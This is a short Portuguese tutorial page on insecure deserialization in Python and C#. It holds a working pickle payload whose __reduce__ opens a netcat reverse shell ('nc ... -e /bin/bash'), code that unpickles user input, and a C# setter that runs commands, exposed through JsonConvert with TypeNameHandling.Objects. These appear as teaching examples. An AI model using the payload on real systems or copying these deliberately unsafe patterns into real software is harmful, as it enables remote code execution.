Insecure Deserialization | Solyd One
-
Insecure Deserialization | Solyd One
-
No código abaixo, estamos realizar um
shell reversepor meio da serialização e deserialização
Python
Serialização
import pickle
import base64
import os
class Evil:
def __reduce__(self):
return (os.system, ("nc 127.0.0.1 7788 -e /bin/bash",))
print(base64.b64encode(pickle.dumps(Evil())))
Deserialização
import pickle
import base64
data = input(">>")
deserialized = pickle.loads(base64.b64decode(data))
print(deserialized)
C#
public class CommandManager {
public string? output { get; set; }
private string? _command;
public string? command {
get { return _command; }
set {
_command = value;
Process p = new Process();
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.FileName = "/usr/bin/env";
p.StartInfo.Arguments = _command;
p.Start();
output = p.StandardOutput.ReadToEnd();
p.WaitForExit();
Console.WriteLine(output);
}
}
};
/**/
var result = JsonConvert.DeserializeObject<object>(
user_input,
new JsonSerializerSettings { TypeNameHandling = TypeNameHandling.Objects }
);
- POC: https://github.com/omerlh/insecure-deserialisation-net-poc
- Artigo: https://blog.crowsec.com.br/desserializacao-insegura-em-net-core/